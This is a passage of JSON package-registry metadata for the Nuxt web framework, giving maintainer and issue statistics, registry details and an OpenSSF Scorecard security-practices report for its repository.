0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema/codemeta","maintainers":[{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-19T18:27:08.017Z","updated_at":"2023-08-19T18:27:08.017Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":14147557,"name":"org.mvnpm:nuxt","ecosystem":"maven","description":"Nuxt is a free and open-source framework with an intuitive and extendable way to create type-safe, performant and production-grade full-stack web applications and websites with Vue.js.","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"org.mvnpm","versions_count":1,"first_release_published_at":"2026-03-29T22:20:57.000Z","latest_release_published_at":"2026-03-29T22:20:57.000Z","latest_release_number":"4.4.2","last_synced_at":"2026-05-11T01:23:04.031Z","created_at":"2026-03-29T22:30:17.489Z","updated_at":"2026-05-11T01:23:04.031Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm/nuxt/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm/nuxt/","metadata":{},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-03-27T22:54:07.000Z","size":135561,"stargazers_count":59951,"open_issues_count":922,"forks_count":5578,"subscribers_count":781,"default_branch":"main","last_synced_at":"2026-03-27T22:58:53.593Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-03-27T22:36:57.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":317,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31168404,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-29T21:28:10.185Z","status":"ssl_error","status_checked_at":"2026-03-29T21:23:32.226Z","response_time":89,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-03-29T22:32:02.461Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":29.64704261927198,"dependent_packages_count":42.38355423497933,"stargazers_count":0.39918618392780403,"forks_count":1.2635300279329609,"docker_downloads_count":null,"average":18.423328266528017},"purl":"pkg:maven/org.mvnpm/nuxt","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm:nuxt","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm:nuxt","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm:nuxt/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-28T09:00:16.075Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":701,"past_year_pull_requests_count":1163,"past_year_avg_time_to_close_issue":643507.1847826086,"past_year_avg_time_to_close_pull_request":224707.08352402746,"past_year_issues_closed_count":368,"past_year_pull_requests_closed_count":874,"past_year_pull_request_authors_count":115,"past_year_issue_authors_count":521,"past_year_avg_comments_per_issue":2.159771754636234,"past_year_avg_comments_per_pull_request":3.2768701633705932,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":467,"past_year_merged_pull_requests_count":766,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":221,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"OrbisK","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"Mini-ghost","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"BobbieGoede","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"cernymatej","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"antfu","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:nuxt/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:nuxt/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api